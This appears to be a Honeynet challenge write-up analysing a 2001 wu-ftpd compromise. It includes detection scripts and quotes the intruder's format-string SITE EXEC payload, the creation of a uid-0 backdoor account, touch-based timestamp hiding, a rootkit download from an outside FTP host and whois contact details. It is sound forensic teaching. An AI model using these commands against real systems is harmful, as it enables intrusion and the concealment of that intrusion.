Introduction

This is the analysis of Scan of the month -October.

Essential tools used are
All time information given here is GMT+8.

Answers to Challenge

* Which vulnerability did the intruder exploit?

The hacker exploited a vulnerability in wu-ftpd.  It is described below:

Name: CVE-2000-0573
Description: The reply function in wu-ftpd 2.6.0 and earlier does not properly cleanse an untrusted format string, which allows remote attackers to execute arbitrary commands via the SITE EXEC command.

This is determined from 2 factors:
  1.  The FTP server version is "wu-2.6.0(1)"
  2.  The many SITE EXEC attempts, which resulted in a root shell.

The decode of the start of attack is shown below:

        220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
        USER ftp
        331 Guest login ok, send your complete e-mail address as password.
        PASS mozilla@
        230 Guest login ok, access restrictions apply.
        SITE EXEC %020d|%.f%.f|
        200-00000000000000000049|0-2|
        200  (end of '%020d|%.f%.f|')
        SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|

The intruder used source IP address 207.35.251.172 for the exploit.
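The two indicators above (the banner version and the run of SITE EXEC commands carrying printf directives) can be pulled out of a control-channel decode mechanically. The Python below is an added example and is not part of the original writeup: it takes the exchange shown above as a constructed sample and flags SITE EXEC arguments that contain format directives, the pattern CVE-2000-0573 abuses. The function names, the regexes and the triage output are my own choices.

```python
import re

# Constructed sample: the control-channel exchange from the writeup, shortened,
# plus one harmless SITE EXEC so the filter has something to let through.
SAMPLE_CONTROL_STREAM = """\
220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
SITE EXEC %020d|%.f%.f|
200-00000000000000000049|0-2|
200  (end of '%020d|%.f%.f|')
SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
SITE EXEC ls -la
"""

# One printf-style conversion: '%', optional flags, width, precision and
# length modifier, then a conversion letter.  '%%' (a literal percent) is
# removed before matching so it is never counted.
DIRECTIVE_RE = re.compile(r"%[-+ #0]*\d*(?:\.\d*)?[hlLqjzt]*[diouxXeEfFgGaAcspn]")
SITE_EXEC_RE = re.compile(r"^SITE\s+EXEC\s*(.*)$", re.IGNORECASE)
BANNER_RE = re.compile(r"^220 .*Version wu-(\S+)", re.MULTILINE)


def count_directives(arg):
    """Number of format directives in a SITE EXEC argument.  A legitimate
    command argument has no reason to carry any; runs of '%.f' and '%08x'
    are the attacker walking the stack through the vulnerable reply()."""
    return len(DIRECTIVE_RE.findall(arg.replace("%%", "")))


def banner_version(text):
    """The wu-ftpd version string from the 220 greeting, or None."""
    m = BANNER_RE.search(text)
    return m.group(1) if m else None


def is_vulnerable_version(version):
    """True for wu-ftpd 2.6.0 and earlier (the range CVE-2000-0573 names).
    Distribution backports can fix the bug without bumping the version, so
    treat this as a hint; the SITE EXEC evidence is the stronger signal."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    return bool(m) and tuple(int(x) for x in m.groups()) <= (2, 6, 0)


def flag_site_exec(text):
    """Every SITE EXEC command whose argument carries format directives."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SITE_EXEC_RE.match(line.strip())
        if not m:
            continue
        n = count_directives(m.group(1))
        if n:
            hits.append({"line": lineno, "arg": m.group(1), "directives": n})
    return hits


def triage(text):
    """Summarise one control-channel decode the way the writeup reasons:
    a vulnerable banner plus format-string SITE EXECs means exploitation."""
    version = banner_version(text)
    hits = flag_site_exec(text)
    return {
        "version": version,
        "version_vulnerable": bool(version) and is_vulnerable_version(version),
        "format_string_attempts": len(hits),
        "verdict": "wu-ftpd SITE EXEC format-string exploitation"
        if hits else "no format-string SITE EXEC seen",
    }


if __name__ == "__main__":
    for hit in flag_site_exec(SAMPLE_CONTROL_STREAM):
        print(f"line {hit['line']}: {hit['directives']} directives in {hit['arg']!r}")
    print(triage(SAMPLE_CONTROL_STREAM))
```

The same filter can be run over an FTP daemon's xferlog or a snort alert stream; anything with one or more directives in a SITE EXEC argument is worth an alert on its own, and a burst of them from one source, as in this capture, is the exploit in progress.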

* What ways, and in what order, did the intruder use to connect and run commands on the system?

This can be determined in 2 ways, by cross-checking the snort log against the syslog.

1] At 2001-09-17 07:52:51
The intruder telnetted in from IP address 217.156.93.166 and tried to log in as userid:nobody with password:ultravirus, then again as userid:nobody with password:virus.
A final attempt to log in as userid:uucp ended when the connection timed out.

2] At 2001-09-17 07:55:45
The intruder connected by FTP from IP address 207.35.251.172 and exploited the wu-ftpd vulnerability to own the system.
After owning the system, the following commands were issued through the FTP connection:
        id;
        w
        dir
        cd /usr
        ls
        cd local
        dir
        cd bin
        dir
        cd etc
        ls --color
        cd ..
        cd etc
        ls--color
        ls
        dir
        pwd
        cd ..
        cd doc
        dir
        cd /tmp
        dir
        cd /
        dir
        cd dev
        dir
        dir
        cd /etc/X11/applnk
        ls
        cd internet
        cd Internet
        ls
        pwd
        passwd nobody -d

08:13:27 After changing the password of "nobody", the intruder telnetted into the system
as userid:nobody to verify that access was available. After executing "w"
to check, the intruder logged out.
The intruder then continued with the existing FTP connection and issued the following
commands:
        cd /
        mkdir -p /etc/X11/applnk/Internet/.etc
        mkdir -p /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc /etc/X11/applnk/Internet/.etc
        passwd nobody -d
        /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
        passwd dns -d
        touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
        touch -acmr /etc/X11/applnk/Internet/.etc /etc
        ls
        ls -d
        ls -s
        ls -a
        ls -n
        ls -lt
        cd etc
        ls -lt
        cat passwd-

08:32:10 The intruder telnetted into the system again as "nobody", then
issued the following commands:

        su dns
        w
        cd /tmp
        mc -s
        cd /dev/rd
        ftp teleport.go.ro  [after which the intruder exited]
        mkdir sdc0
        cd sdc0
        ls
        ftp teleport.go.ro

08:41:34 During the ftp session to teleport.go.ro,
the following commands were used:
        USER teleport
        PASS gunoierul
        SYST
        CWD new
        TYPE I
        PORT 192,168,1,102,4,2
        RETR Zer0.tar.gz
        PORT 192,168,1,102,4,3
        RETR copy.tar.gz
        PORT 192,168,1,102,4,4
        RETR ooty.tar.gz
        QUIT

08:43:05 After retrieving the rootkits, the intruder continued with:

        tar zxvf Zer0.tar.gz
        cd Zer0/
        ls
        ./Go 24

During the execution of "Go", the intruder attempted what seemed like port scans.

08:51:58 The intruder continued with the following commands in an SSH session (the following is based on the syslog information):
        w
        whoami
        cd /dev/rd/sdc0
        ls
        rm Zer0.tar.gz
        ls
        alias ls='ls --color'
        ls
        ls
        passwd nobody
        ping www.yahoo.com
        pico /etc/rc.d/rc3.d/S50inet
        ls
        mv copy.tar.gz /usr/X11R6/bin/.,/copy/
        cd /usr/X11R6/bin/.,/copy/
        mv copy.tar.gz ../
        ls
        cd ..
        tar zxvf copy tar.gz
        chmod 7777 *
        ls
        rm copy.tar.gz
        cd copy
        chmod 7777 *
        ls

* How did the intruder try to hide his edits from the MAC times?


The commands used to hide his edits from the MAC times, as described previously, are shown below; the unindented line before each group explains what it does:

First, create objects for storing the original MAC times:
        mkdir -p /etc/X11/applnk/Internet/.etc
        mkdir -p /etc/X11/applnk/Internet/.etcpasswd

Use the touch command to transfer the original MAC times onto the new objects:
        touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc /etc/X11/applnk/Internet/.etc

The intruder then makes his changes:
        passwd nobody -d
        /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
        passwd dns -d

Finally, use the touch command to restore the original MAC times:
        touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
        touch -acmr /etc/X11/applnk/Internet/.etc /etc
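What touch -acmr can and cannot put back is worth seeing concretely. The Python below is an added example, not code from the writeup or from the rootkit: it replays the intruder's sequence against a throwaway copy of passwd in a temporary directory and then applies two defender checks. os.utime is the equivalent of touch -acmr and sets atime and mtime only; neither touch nor utime can set ctime, which the kernel stamps with the current time on every inode change, so a file whose ctime is far newer than its mtime has been backdated (chmod and chown also bump ctime, so treat it as a lead, not proof). The second check hunts for the holder objects themselves: anything whose atime/mtime pair exactly equals that of the file being protected. The directory names, the epoch constant and the sample passwd content are constructed stand-ins for the real paths.

```python
import os
import tempfile

# Constructed stand-in for "the original MAC time" of the protected file
# (1_000_000_000 s since the epoch = 2001-09-09 01:46:40 UTC, chosen arbitrarily).
OLD_TS_NS = 1_000_000_000 * 10**9


def copy_mac_times(src, dst):
    """Equivalent of `touch -acmr src dst`: copy atime and mtime from src onto
    dst.  Like touch, this cannot carry ctime over; the kernel stamps dst's
    ctime with the current time as a side effect of the change."""
    st = os.stat(src)
    os.utime(dst, ns=(st.st_atime_ns, st.st_mtime_ns))


def ctime_skew_seconds(path):
    """How much newer the inode change time is than the content modification time."""
    st = os.stat(path)
    return (st.st_ctime_ns - st.st_mtime_ns) / 1e9


def looks_backdated(path, tolerance=60.0):
    """A ctime far ahead of mtime means the timestamps were set by hand after
    the last write.  chmod/chown also bump ctime, so this is a lead, not proof."""
    return ctime_skew_seconds(path) > tolerance


def find_timestamp_twins(root, reference):
    """Paths under root whose (atime, mtime) pair equals reference's exactly:
    the holder objects the intruder created carry a copy of the times."""
    ref = os.stat(reference)
    twins = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.samefile(path, reference):
                continue
            st = os.stat(path)
            if (st.st_atime_ns, st.st_mtime_ns) == (ref.st_atime_ns, ref.st_mtime_ns):
                twins.append(os.path.relpath(path, root))
    return sorted(twins)


def replay_touch_trick(workdir):
    """Re-run the writeup's sequence against a throwaway passwd file and report
    what each defender check sees afterwards."""
    target = os.path.join(workdir, "passwd")               # stands in for /etc/passwd
    hidden = os.path.join(workdir, "applnk", "Internet")    # stands in for /etc/X11/applnk/Internet
    stash = os.path.join(hidden, ".etcpasswd")
    os.makedirs(hidden)
    with open(target, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")        # constructed content
    os.utime(target, ns=(OLD_TS_NS, OLD_TS_NS))             # make the file look long untouched
    os.makedirs(stash)                                      # mkdir -p .../.etcpasswd
    copy_mac_times(target, stash)                           # touch -acmr /etc/passwd .../.etcpasswd
    with open(target, "a") as f:                            # adduser dns ... rewrites passwd
        f.write("dns:x:0:0::/bin:/bin/bash\n")
    copy_mac_times(stash, target)                           # touch -acmr .../.etcpasswd /etc/passwd
    return {
        "mtime_restored": os.stat(target).st_mtime_ns == OLD_TS_NS,
        "backdated": looks_backdated(target),
        "twins": find_timestamp_twins(workdir, target),
    }


def run_demo():
    return replay_touch_trick(tempfile.mkdtemp(prefix="mactime-"))


if __name__ == "__main__":
    print(run_demo())
```

On the real victim the same two checks apply to /etc/passwd and /etc: the restored mtime is exactly the old one, but the ctime carries the time of the intruder's last touch, and the hidden .etc and .etcpasswd entries under /etc/X11/applnk/Internet are the only objects on the box whose times match /etc and /etc/passwd to the nanosecond.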

* The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

The 3 rootkits downloaded are Zer0, copy and ooty.
The package listings are shown below:

tar tvfz zero.tar.gz
drwxrwxr-x george/george     0 2001-09-14 08:00:54 Zer0/
-rwxr-xr-x george/george  9458 2001-09-17 08:26:34 Zer0/Go
-rw-r--r-- george/george 100569 2001-09-10 04:38:11 Zer0/ssh.tgz
-rw-rw-r-- george/george  11364 2001-09-10 17:01:02 Zer0/tls.tgz
-rw-r--r-- george/george  11970 2001-09-13 07:10:57 Zer0/adr.tgz
-rw-r--r-- george/george  11723 2001-09-10 04:43:17 Zer0/adr2.tgz
-rw-r--r-- george/george   2333 2001-09-17 08:27:45 Zer0/adore.h


tar tvfz copy.tar.gz
drwxr-xr-x virus/virus       0 2001-08-20 20:35:32 copy/
-rwxrwxrwx virus/virus    8268 2001-03-25 04:31:07 copy/mj2
-rwxrwxr-x virus/virus    8268 2001-05-29 01:40:00 copy/mj3
-rwxr-xr-x virus/virus  652030 1999-09-09 20:50:09 copy/ssh
drwxrwxr-x virus/virus       0 2001-09-05 21:05:39 copy/smrf/
-rwxr-xr-x virus/virus   22846 2001-06-16 20:44:00 copy/smrf/smrf5
-rw-r--r-- virus/virus    1470 2001-09-05 21:04:04 copy/smrf/smurf.ips
-rwxrwxr-- virus/virus     128 2001-08-18 15:37:28 copy/root_them
-rwxrwxr-- virus/virus   12166 2001-06-22 01:25:00 copy/process_list
-rwxrwxrwx virus/virus   12847 2001-02-16 20:07:00 copy/generate
-rwxrwxr-x virus/virus   27682 2001-08-18 15:38:43 copy/suu.tgz
-rwxrwxr-x virus/virus   14365 2001-08-14 10:34:56 copy/genmass
-rwxr-xr-x virus/virus  100158 2001-06-22 09:19:00 copy/zxploit
-rwxrwxrwx virus/virus   15121 2001-01-19 21:09:21 copy/wu-scan

tar tvfz ooty.tar.gz
drwxrwxr-x virus/virus       0 2001-09-04 11:06:12 ooty/
-rw-rw-r-- virus/virus     438 2001-06-28 13:16:50 ooty/CrOn
-rw-r--r-- virus/virus    6100 2001-05-30 08:14:17 ooty/motd
-rwxrwxr-x virus/virus   11894 2001-06-28 13:18:21 ooty/sush
-rwxr-xr-x virus/virus     460 2001-05-30 08:14:17 ooty/bindpar.x
-rw-rw-r-- virus/virus      81 2001-06-28 13:18:19 ooty/bighole.c
-rwxr-xr-x virus/virus      58 2001-06-28 13:18:19 ooty/flare
crw--w---- virus/tty     136,2 2001-09-04 11:06:44 ooty/none ~!bighole
-rwxr-xr-x virus/virus   13548 2001-05-30 08:14:17 ooty/crontab.x
-rwxr-xr-x virus/virus    1791 2001-05-30 08:14:17 ooty/mail.x
-rwxr-xr-x virus/virus    2141 2001-05-30 08:14:17 ooty/perl.x
-rwxr-xr-x virus/virus    1332 2001-05-30 08:14:17 ooty/prlnx.sh
-rwxrwxr-x virus/virus   12025 2001-06-28 13:18:20 ooty/bighole
-rwxr-xr-x virus/virus   14428 2001-05-30 08:14:17 ooty/kernel.x


From the evidence of the package contents alone, there is a certain amount
of customisation, as some of the files were created quite recently.
The adore rootkit is a rather well-known one.

* Recover (tell how you did it too) the rootkits from the snort binary capture

Using Ethereal, load the snort capture.
For each FTP transfer, choose any FTP-DATA packet of that transfer and click 'Follow TCP stream'.
Then save the TCP stream in hex dump format to a file.
Open the file in vi and run ':%s/^........//' to globally remove the first 8 characters (the offset counter) from each line.
Pipe the file to a perl script that converts the hex back into a binary file (e.g. 'cat filename | ./convert.pl').
The perl script convert.pl is shown below:

        #!/usr/bin/perl
        use strict;
        use warnings;

        # Reads hex dump lines (offset column already removed) from stdin
        # and writes the decoded bytes to rk.tar.gz.
        open(my $output, '>', 'rk.tar.gz') or die "cannot open rk.tar.gz: $!";
        binmode($output);

        while (<>)
        {
            s/\W//g;                        # strip spaces, newlines and other separators
            print $output pack("H*", $_);   # decode the remaining hex digits into bytes
        }
        close($output);

In this case the output file 'rk.tar.gz' is the rootkit.
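The strip-and-pack recipe above relies on the saved dump containing nothing but the offset column and hex bytes. The Python below is an added example, not the author's convert.pl: it parses a 'Follow TCP Stream' style hex dump (offset, hex bytes, optional ASCII column; that layout is an assumption), verifies that offsets are contiguous so a stream saved with both directions or a missing segment is caught instead of silently producing a corrupt archive, and checks the result for the gzip magic. naive_strip transcribes the writeup's approach for contrast, run over a constructed line whose ASCII column happens to contain hex-looking text. The sample archive standing in for Zer0.tar.gz is built with gzip at run time.

```python
import gzip
import re

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
OFFSET_RE = re.compile(r"^([0-9A-Fa-f]{8})\s{1,2}(.*)$")
BYTES_PER_LINE = 16


def render_hex_dump(data):
    """Offset / hex / ASCII layout as 'Follow TCP Stream' saves it (assumed
    layout; used here only to build sample input)."""
    lines = []
    for off in range(0, len(data), BYTES_PER_LINE):
        chunk = data[off:off + BYTES_PER_LINE]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(BYTES_PER_LINE * 3 - 1)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart}  {text}")
    return "\n".join(lines) + "\n"


def parse_hex_dump(text):
    """Decode a one-direction hex dump back to bytes, checking offsets."""
    out = bytearray()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = OFFSET_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: no offset column")
        offset = int(m.group(1), 16)
        if offset != len(out):
            raise ValueError(f"line {lineno}: offset {offset:#x}, expected {len(out):#x} "
                             "(mixed directions or a missing segment?)")
        # The hex field ends at the first double space; the ASCII column follows it.
        tokens = m.group(2).split("  ")[0].split()
        if not tokens or len(tokens) > BYTES_PER_LINE or not all(HEX_PAIR.match(t) for t in tokens):
            raise ValueError(f"line {lineno}: malformed hex field")
        out += bytes.fromhex("".join(tokens))
    return bytes(out)


def naive_strip(text):
    """The writeup's recipe transcribed: drop the 8 offset characters, strip
    non-word characters, treat the rest as hex.  Correct when the dump has no
    ASCII column; wrong when it does, because that column's letters and
    digits survive the strip and get decoded as data."""
    hexdigits = "".join(re.sub(r"\W", "", line[8:]) for line in text.splitlines() if line.strip())
    return bytes.fromhex(hexdigits)


def check_gzip(data):
    """Magic-number and decompression check on a recovered archive."""
    report = {"magic": data[:2] == b"\x1f\x8b", "decompresses": False, "size": 0}
    try:
        plain = gzip.decompress(data)
        report.update(decompresses=True, size=len(plain))
    except (OSError, EOFError):
        pass
    return report


# Constructed inputs: a line whose ASCII column reads "1f 8b." and a small
# gzip archive standing in for Zer0.tar.gz (mtime=0 keeps it deterministic).
TRICKY_DUMP = render_hex_dump(b"1f 8b\n")
SAMPLE_ARCHIVE = gzip.compress(b"Zer0/Go\nZer0/adore.h\n" * 20, mtime=0)


def demo_roundtrip():
    recovered = parse_hex_dump(render_hex_dump(SAMPLE_ARCHIVE))
    return {"roundtrip": recovered == SAMPLE_ARCHIVE, **check_gzip(recovered)}


if __name__ == "__main__":
    print(demo_roundtrip())
    print(parse_hex_dump(TRICKY_DUMP), naive_strip(TRICKY_DUMP))
```

The offset check is the part that pays off on a real capture: a retransmitted or lost segment shows up as a jump in the offset column, and an archive rebuilt across such a gap will fail the gzip check or, worse, unpack to a subtly wrong tree.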

* What does the rootkit do to hide the presence of the attacker on the system?

By analysing the "Go" script, it does the following to hide the intruder:
1] kills the syslogd daemon
2] checks for remote logging of syslog and warns the attacker
3] installs the 'adore' LKM rootkit, which does most of the actual hiding
4] also uses the 'touch' command as described previously.

* What did you learn from this exercise?

It is interesting to note that the intruder attacked from 2 different IP addresses.
Also, running 'strings' on the zxploit program in the 'copy' rootkit shows that it is a SITE EXEC exploit using the "mozilla@" FTP password. Hence, most likely the intruder used the zxploit program to hack into this system.

* How long did this challenge take you?

About 1 hour to determine the exploit used.
About 3 hours to check for tools, but in the end I wrote my own script to extract the rootkits.
About 3 hours to trace the sequence of events.

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.


Two systems were used in the attack. Their owners were determined using whois, as shown below:

whois "217.156.93.166"@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:      217.156.93.0 - 217.156.93.255
netname:      MIDO-IMPEX
descr:        S.C. MIDO IMPEX S.R.L.
descr:        9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA
country:      RO
admin-c:      RD5445-RIPE
tech-c:       RD5445-RIPE
status:       ASSIGNED PA
mnt-by:       AS3233-MNT
notify:       domain-admin@listserv.rnc.ro
changed:      cristih@rnc.ro 20010515
source:       RIPE

person:       ROMULUS DOGARU
address:      9 C 5 MARASESTI ST
address:      5500, BACAU
address:      ROMANIA
phone:        +40-34-171060
fax-no:       +40-34-171080
e-mail:       romi@mido.ro
nic-hdl:      RD5445-RIPE
notify:       domain-admin@listserv.rnc.ro
mnt-by:       AS3233-MNT
changed:      cristih@rnc.ro 20001124
source:       RIPE

whois "207.35.251.172"@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA) GRICS01
                                                   207.35.0.0 - 207.35.255.255
B-Line Technical Services (NETBLK-B-LINE-CA) B-LINE-CA
                                               207.35.251.160 - 207.35.251.191

whois GRICS01@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA)
   265 de la Couronne
   Quebec City, Quebec J2S 1H9
   CA

   Netname: GRICS01
   Netblock: 207.35.0.0 - 207.35.255.255
   Maintainer: LINX

   Coordinator:
      Daoust, Philippe  (PD135-ARIN)  noc@in.bell.ca
      1-800-450-7771 +1 (416) 215-5423

   Domain System inverse mapping provided by:

   NS1.BELLGLOBAL.COM           198.235.216.1
   NS2.BELLGLOBAL.COM           198.235.216.2

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 26-May-2000.
   Database last updated on 2-Oct-2001 23:19:58 EDT.


The following is a sample notification letter -

Dear owner,

Recently our machine was compromised, and after analysis of our logs we have clear and persistent evidence that
your machine was used to gain unauthorised entry to our machine. If you require the help of your local authorities
to follow up, please disconnect your machine from the network immediately.

Attached is a partial packet capture of the intrusion:
(Time given is 2001-09-17 GMT+8)
217.156.93.166
207.35.251.172